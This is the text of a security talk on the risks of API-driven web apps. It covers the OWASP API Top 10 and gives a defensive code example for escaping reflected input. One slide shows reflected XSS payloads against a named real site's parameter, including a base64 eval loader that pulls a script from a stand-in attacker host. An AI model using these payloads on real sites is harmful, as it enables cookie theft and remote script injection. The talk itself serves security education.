Web Apps: APIs’ Nightmare
www.char49.com (TRUE SECURITY)
Who Am I
Paulo Silva
● Security Researcher/Pentester
● 15+ years as a Software Developer
● Long-term OWASP Volunteer
● Strong believer in spreading security awareness
@pauloasilva_com
/devpauloasilva
paulo@char49.com

(Slide image: the birth of the web; source: https://home.cern/science/computing/birth-web)
Traditional Web Applications

Diagram (built up across several slides): Client <-- HTTP --> Server (PHP, Database)

Server file tree:
  scripts/  main.js . . .
  style/    display.js . . .
  images/   background.js . . .
  php/      index.php, login.php . . .

Request/response sequence:
  GET /                    Content-Type: text/html
  GET /scripts/main.js     Content-Type: application/javascript
  GET /style/display.css   Content-Type: text/css
  ...
  GET /login.php           Content-Type: text/html
  POST /login.php          Content-Type: text/html
Mobile Applications

Diagram: Client <-- HTTP --> Server (PHP, Database)

Server file tree:
  php/  auth.php, users.php, posts.php, comments.php . . .

Request/response sequence:
  POST /login       Content-Type: application/json
  GET /users/me     Content-Type: application/json
  GET /posts/       Content-Type: application/json
  ...
Connected Things (Internet of Things)

Diagram: Client <-- HTTP --> Server back end: API 1, API 2, API 3, ... API N; DB 1, DB 2; 3rd Party APIs; Service 1, Service 2, Service 3, Service 4, ... Service N

Request/response sequence:
  GET /device/config   Content-Type: application/json
  POST /device/auth    Content-Type: application/json
  POST /location       Content-Type: application/json
  ...
Modern Web Applications

Diagram: Client <-- HTTP --> Server back end: API 1, API 2, API 3, ... API N; DB 1, DB 2; 3rd Party APIs; Service 1, Service 2, Service 3, Service 4, ... Service N

Server file tree:
  public/  index.html, bundle.js ...

Request/response sequence:
  GET /              Content-Type: text/html
  GET /bundle.js     Content-Type: application/javascript
  POST /login        Content-Type: application/json
  ...
  GET /places/1234   Content-Type: application/json
  ...
OWASP API Security Top 10
API1:2023 Broken Object-Level Authorization
API2:2023 Broken Authentication
API3:2023 Broken Object Property Level Authorization
API4:2023 Unrestricted Resource Consumption
API5:2023 Broken Function-Level Authorization
API6:2023 Unrestricted Access to Sensitive Business Flows
API7:2023 Server Side Request Forgery
API8:2023 Security Misconfiguration
API9:2023 Improper Inventory Management
API10:2023 Unsafe Consumption of APIs
Cross-Site Scripting

Vulnerable parameter (ke):
https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=alert(document.cookie)>

Loader (the injected tag) carrying a base64 payload handed to atob():
https://campaigns.porsche.com/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D80037659B111&ke=6546546<img src=x onerror=eval(atob("KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID0gJ2h0dHBzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ=="))>

Slide annotations: Loader, Payload, Malicious Script, HTTP Fundamentals.
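The reflected parameter above, as an added example that is not part of the talk and not code from the site named on the slide: a stand-in handler that echoes the ke query parameter into HTML verbatim (the defect the injected tag relies on) beside the same handler with HTML entity encoding, plus a log-review check that flags query values carrying a tag or an inline event handler. The endpoint path and parameter names follow the slide; the host, the pid value, the handler functions and the "Charging code" label are constructed for this example.

```javascript
// Added example (not from the talk, not the site's own code).
// Endpoint path and the "ke" parameter name are taken from the slide; the
// host, the pid value, the handler functions and the label text are
// constructed for this example.

// Constructed sample: a request shaped like the slide's, with the
// injected <img onerror> in the ke parameter and a placeholder host/pid.
const SAMPLE_URL =
  "https://api.example.invalid/charging/WebAjaxGet?OpenAgent&typ=nummer&la=USen" +
  "&pid=PID_PLACEHOLDER&ke=6546546<img src=x onerror=alert(document.cookie)>";

// Read one query parameter the way a server would see it. The WHATWG URL
// parser percent-encodes the raw "<", ">" and spaces, and searchParams.get()
// decodes them again, so the original injected string comes back intact.
function extractParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Entity-encode the five characters that can terminate an HTML text node
// or attribute value. Correct for a text or quoted-attribute context only.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Before: the parameter is interpolated into the HTML response verbatim,
// so the injected <img> becomes real markup and its onerror handler runs.
function renderVulnerable(ke) {
  return `<p>Charging code: ${ke}</p>`;
}

// After: the same template, value entity-encoded first. The browser shows
// the literal text "<img src=x ...>" and executes nothing.
function renderSafe(ke) {
  return `<p>Charging code: ${escapeHtml(ke)}</p>`;
}

// Review check: does the rendered fragment contain any tag the template
// did not put there? The template contributes only <p> and </p>.
function containsForeignTag(html) {
  const tags = html.match(/<\/?[a-zA-Z][^>]*>/g) || [];
  return tags.some((tag) => !/^<\/?p>$/.test(tag));
}

// Log-review heuristic: names of query parameters whose value carries an
// HTML tag opener or an inline event-handler attribute (onerror=, onload=, ...).
function suspiciousParams(url) {
  const hits = [];
  for (const [name, value] of new URL(url).searchParams) {
    if (/<[a-zA-Z]/.test(value) || /\bon[a-z]+\s*=/i.test(value)) hits.push(name);
  }
  return hits;
}

function demo() {
  const ke = extractParam(SAMPLE_URL, "ke");
  console.log("vulnerable:", renderVulnerable(ke));
  console.log("safe:      ", renderSafe(ke));
  console.log("flagged params:", suspiciousParams(SAMPLE_URL));
}

demo();
```

Run with node: the vulnerable render reproduces the live <img> tag, the safe render returns it as inert text. Entity encoding is the fix for a text or quoted-attribute context only; a value placed inside a script block, a URL or an attribute name needs the encoding for that context. An endpoint that is meant to return JSON should also say so, with Content-Type: application/json and X-Content-Type-Options: nosniff, so the browser never treats the body as HTML in the first place.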
Resources

OWASP
● OWASP API Security Project
  ● OWASP API Security Top 10 2023
  ● OWASP API Security Top 10 2019
● Goats
  ● OWASP Vulnerable Web Applications Directory
  ● OWASP crAPI - Completely Ridiculous API
  ● OWASP Juice Shop
● OWASP Cheat Sheets Series
  ● Authentication Cheat Sheet
  ● Authorization Cheat Sheet
  ● GraphQL Cheat Sheet
  ● REST Security Cheat Sheet
  ● Web Service Security Cheat Sheet
● OWASP Secure Coding Practices-Quick Reference Guide
● OWASP Go Secure Coding Practices Guide

Other References
● HTTP
  ● Basics of HTTP - mdn web docs
  ● Cross-Origin Resource Sharing (CORS) - mdn web docs
● API Protocols
  ● REST
    ● Representational state transfer - Wikipedia
    ● Representational State Transfer (REST) - Fielding Dissertation
  ● RPC
    ● Remote procedure call - Wikipedia
    ● OpenRPC
    ● JSON-RPC
    ● XML-RPC
    ● gRPC
  ● GraphQL
    ● Introduction to GraphQL
    ● GraphQL blogposts Series - Checkmarx
    ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify
● MindAPI
  ● MindAPI References

Thank You!
www.char49.com